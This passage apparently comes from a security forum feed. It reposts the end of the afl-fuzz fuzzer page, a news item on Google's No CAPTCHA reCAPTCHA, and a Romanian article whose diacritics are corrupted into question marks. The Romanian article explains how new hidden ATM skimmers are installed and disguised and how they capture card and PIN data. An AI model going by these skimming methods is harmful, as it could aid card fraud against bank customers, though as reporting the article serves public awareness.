fuzzers, it has remarkably few failure modes. It also comes with robust, user-friendly problem detection that guides you through any potential hiccups. No tinkering required. In contrast to most other fuzzers, the tool requires essentially no guesswork or fine-tuning. Even if you wanted to, you will find virtually no knobs to fiddle with and no "fuzzing ratios" to dial in. It's chainable to other tools. The fuzzer generates superior, compact test corpora that can serve as a seed for more specialized, slower, or labor-intensive processes and testing frameworks. It sports a hip, retro-style UI. Just scroll back to the top of the page. Enough said. Want to try it out? Check out the documentation or grab the source code right away. [h=2]The bug-o-rama trophy case[/h] The fuzzer is still under active development, and I have not been running it very systematically or at a scale. Still, based on user reports, it seems to have netted quite a few notable vulnerabilities and other uniquely interesting bugs. Some of the "trophies" that I am aware of include: [TABLE] [TR] [TD]IJG jpeg 1 [/TD] [TD]libjpeg-turbo 1 2 [/TD] [TD]Mozilla Firefox 1 2 3 4 [/TD] [/TR] [TR] [TD]Google Chrome 1 [/TD] [TD]Internet Explorer 1 2 [/TD] [TD]bash (post-Shellshock) 1 2 [/TD] [/TR] [TR] [TD]GnuTLS 1 [/TD] [TD]GnuPG 1 2 [/TD] [TD]OpenSSH 1 2 3 [/TD] [/TR] [TR] [TD]FLAC audio library 1 [/TD] [TD]tcpdump 1 2 3 4 5 6 [/TD] [TD]dpkg 1 [/TD] [/TR] [TR] [TD]systemd-resolved 1 2 [/TD] [TD]strings (+ related tools) 1 2 3 4 5 6 7 [/TD] [TD]less / lesspipe 1 2 3 [/TD] [/TR] [TR] [TD]rcs 1 [/TD] [TD]OpenBSD pfctl 1 [/TD] [TD]man & mandoc 1 [/TD] [/TR] [TR] [TD]libyaml 1 [/TD] [TD]Info-Zip unzip 1 [/TD] [TD]procmail 1 [/TD] [/TR] [TR] [TD]libsndfile 1 2 3 [/TD] [TD]fwknop[/TD] [TD]mutt 1 [/TD] [/TR] [/TABLE] Plus, probably, quite a few other things that weren't attributed to the tool and that I have no way of knowing about. [h=2]Download & other useful links[/h] Here's a collection of useful links related to afl-fuzz: Current and past releases of the tool (changes), Online copy of the README file, Description of the status screen, Generated test cases for common image formats, Notes on the inspiration and design goals for afl-fuzz. The tool is confirmed to work on x86 Linux, OpenBSD, FreeBSD, and NetBSD, both 32- and 64-bit. It should also work on MacOS X and Solaris, although with some constraints. It supports programs written in C, C++, or Objective C, compiled with either gcc or clang. Java programs compiled with GCJ can be supported with very little effort. If you are honestly interested, ping me and I'll help you set it up. For fuzzing Python, you may want to check out this module from Jakub Wilk. To send bug reports, feature requests, or chocolate, simply drop a mail to lcamtuf@coredump.cx. Sursa: american fuzzy lop
-
[h=1]Google Reinvents the CAPTCHA[/h] [h=4]Tara Seals US/North America News Reporter, Infosecurity Magazine[/h] Email Tara We’re all familiar with reCAPTCHAs: those scrambled letter ciphers that users are asked to key in, in order to protect websites from spam and abuse by robots. For years, web surfers have been asked to read distorted text and type it into a box—leading to a safer web, but a more frustrated user populace. Sometimes, not even live humans can get the CAPTCHAs right. Google aims to change all of that—by reinventing the CAPTCHA experience. “We figured it would be easier to just directly ask our users whether or not they are robots—so, we did!” said Vinay Shet, Google’s product manager for reCAPTCHA, in a blog. “We’ve begun rolling out a new API that radically simplifies the reCAPTCHA experience. We’re calling it the ‘No CAPTCHA reCAPTCHA.’” Now, users are asked to simply check a box that asks, “Are you sure you’re not a robot?” From there, in some cases, a CAPTCHA to solve will be presented. But not always. While the user experience will be better, there’s another reason for the change: Today’s artificial intelligence technology can solve even the most difficult variant of distorted text, at 99.8% accuracy. “Thus distorted text, on its own, is no longer a dependable test,” Shet said. To counter this, Google has developed an advanced risk analysis back-end for reCAPTCHA that actively considers a user’s entire engagement with the CAPTCHA—before, during, and after—to determine whether that user is a human. “This enables us to rely less on typing distorted text and, in turn, offer a better experience for users,” Shet said. And, “while the new reCAPTCHA API may sound simple, there is a high degree of sophistication behind that modest checkbox.” In cases when the risk analysis engine can't confidently predict whether a user is a human or an abusive agent, it will prompt a CAPTCHA to elicit more cues, increasing the number of security checkpoints to confirm the user is valid. Google has also worked on the mobile aspect of CAPTCHAs—after all, typing in a code on a smaller screen offers plenty of room for mis-typing and customer dissatisfaction. So, in one example, a website visitor may be asked to tap, say, all of the pictures of turkeys within a screen of animal tiles. “This new API…lets us experiment with new types of challenges that are easier for us humans to use, particularly on mobile devices,” Shet said. Websites are already adopting these methods, including early adopters like Snapchat, WordPress, Humble Bundle and others. “For example, in the last week, more than 60% of WordPress’ traffic and more than 80% of Humble Bundle’s traffic on reCAPTCHA encountered the No CAPTCHA experience—users got to these sites faster,” Shet said. “Humans, we'll continue our work to keep the Internet safe and easy to use. Abusive bots and scripts, it’ll only get worse—sorry we’re (still) not sorry.” Sursa: Google Reinvents the CAPTCHA - Infosecurity Magazine
-
[h=1]?i ho?ii ?in pasul cu tehnologia: a?a arat? noile Skimmere "invizibile" folosite la clonarea cardurilor de credit[/h] Aurelian Mihai - 3 dec 2014 Dispozitivele aplicate pe bancomate cu scopul a clona cardurile de credit au atins un nivel impresionant de miniaturizare, devenind practic invizibile pentru persoane neavizate. F?r? componente la vedere, noile Skimmere ATM prezint? un risc real la adresa bancomatelor amplasate în spa?ii publice. Deghizate ingenios pentru a atrage cât mai pu?in aten?ia în timpul cât sunt ata?ate de bancomat, dispozitivele de tip Skimmer folosite de infractori pentru clonarea cardurilor bancare se afl? într-o continu? evolu?ie. Recent descoperit la un bancomat din Europa, un nou tip de Skimmer ATM realizat folosind metoda “wiretapping” pare s? fi g?sit camuflajul perfect, dispozitivul fiind instalat practic în interiorul ATM-ului, ac?ionând f?r? a da nimic de b?nuit. Skimmer realizat prin metoda ?wiretapping? Procedeul de instalare presupune aplicarea unei g?uri pe carcasa ATM-ului, chiar în dreptul fantei pentru card. Mai departe, infractorii conecteaz? un dispozitiv de înregistrare miniatural direct la cititorul de card-uri al ATM-ului folosind unelte ?i echipament personalizat. Pentru a nu da de b?nuit, gaura este deghizat? folosind un ab?ibild imitând instruc?iunile de utilizare a bancomatului. Skimmer-ul instalat chiar în interiorul ATM-ului înregistreaz? datele card-urilor în mod autonom. Pentru colectarea datelor recoltate ho?ii nu trebuie decât s? dezlipeasc? ab?ibild-ul ?i s? conecteze firul r?mas la vedere unui dispozitiv de stocare extern. Pân? la alertarea autorit??ilor, procedeul de recoltare a datelor poate fi repetat ori de câte ori este nevoie. Skimmer proiectat pentru a fi strecurat direct în slot-ul pentru acceptare a card-ului O alt? inova?ie în domeniul Skimmerelor ATM este un dispozitiv de forma unei pl?cu?e din o?el, con?inând toate componentele electronice necesare ?i un acumulator suficient pentru pân? la 2 s?pt?mâni de activitate. Proiectat pentru a fi strecurat direct în slot-ul pentru acceptare a card-ului, ?i acesta este complet invizibil pentru utilizatorii aparatului. Diferen?a este c? în loc de cablu, datele colectate sunt trimise prin conexiune wireless unui smartphone aflat în buzunarul infractorului prezentat în fa?a bancomatului ca ?i vizitator. Pentru ca datele colectate de pe card-urile de credit s? poat? fi utilizate este necesar? ?i interceptarea cod-ului pin, folosind o camer? video miniatural? deghizat? într-un panou ata?at în dreptul tastaturii. Sursa: ?i ho?ii ?in pasul cu tehnologia: a?a arat? noile Skimmere "invizibile" folosite la clonarea cardurilor de credit